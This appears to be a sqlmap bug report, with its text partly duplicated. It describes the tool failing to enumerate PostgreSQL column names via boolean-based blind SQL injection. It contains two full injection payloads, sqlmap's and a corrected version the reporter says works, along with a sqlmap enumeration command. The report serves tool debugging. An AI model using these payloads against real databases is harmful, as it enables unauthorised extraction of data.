Describe the bug
Issue initially reported here but wrongly explained as it was failing in all the cases. Hopefully this is explained more clear.
There is at least one scenario where sqlmap is not able to extract column names while exploiting boolean-based blind sqli in postgresql. It works smooth for extracting database names, user, hostname, etc. Checking the verbose mode, the payload seems not to be working correctly in some cases. I'm wondering if the way the tables are joined in the payload, work in all the cases.
sqlmap payload
' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON pg_class.oid=pg_attribute.attrelid
WHERE pg_class.relnamespace=pg_namespace.oid AND pg_type.oid=pg_attribute.atttypid AND attnum>0 AND pg_class.relname='<table_name>' AND nspname='<schema_name>')::text FROM 1 FOR 1))>0 AND 'CxED'='CxED
working payload (in my case)
' AND ASCII(SUBSTRING((SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='<table_name>' AND nspname='<schema_name>' LIMIT 1)::text FROM 1 FOR 1))>0 AND 'CxED'='CxED
To Reproduce
It is hard to reproduce as the difference is in the database side and I can't provide an example (as it is a private app)
- Run
sqlmap -r 1.sql --force-ssl --dbs --no-cast -D <schema_name> -T <table_name> --columns --technique B -v 3
- See error
[ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'
Let me know if you need more information that I could provide by a private channel, to don't disclose details of the app.
Expected behavior
Be able to extract columns names, the same way it is extracting other information like schema name and others.
Screenshots
Running environment:
- sqlmap version 1.2.4#stable
- Installation method: apt
- Operating system: Ubuntu 18.04
- Python version 3.6.9
Target details:
- DBMS PostgreSQL
- SQLi techniques found by sqlmap: boolean-based blind
- WAF/IPS [if any]
- Relevant console output [if any]
- Exception traceback: [ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'
Additional context
I have performed troubleshooting with:
- --parse-errors: no new information provided by the tool
- -t traffic.txt: it performs 3 requests and none of them is returning results so all are false statements (>,<,=)
to be clear: I already have the working payload, I'm just trying to confirm and verify an issue (if any) in sqlmap, to contribute with the project. I manually tested both payloads and the one used by sqlmap doesn't work in my case.
Describe the bug
Issue initially reported here but wrongly explained as it was failing in all the cases. Hopefully this is explained more clear.
There is at least one scenario where sqlmap is not able to extract column names while exploiting boolean-based blind sqli in postgresql. It works smooth for extracting database names, user, hostname, etc. Checking the verbose mode, the payload seems not to be working correctly in some cases. I'm wondering if the way the tables are joined in the payload, work in all the cases.
sqlmap payload
working payload (in my case)
To Reproduce
It is hard to reproduce as the difference is in the database side and I can't provide an example (as it is a private app)
sqlmap -r 1.sql --force-ssl --dbs --no-cast -D <schema_name> -T <table_name> --columns --technique B -v 3[ERROR] unable to retrieve the number of columns for table '<table_name>' in database '<schema_name>'Let me know if you need more information that I could provide by a private channel, to don't disclose details of the app.
Expected behavior
Be able to extract columns names, the same way it is extracting other information like schema name and others.
Screenshots
Running environment:
Target details:
Additional context
I have performed troubleshooting with:
to be clear: I already have the working payload, I'm just trying to confirm and verify an issue (if any) in sqlmap, to contribute with the project. I manually tested both payloads and the one used by sqlmap doesn't work in my case.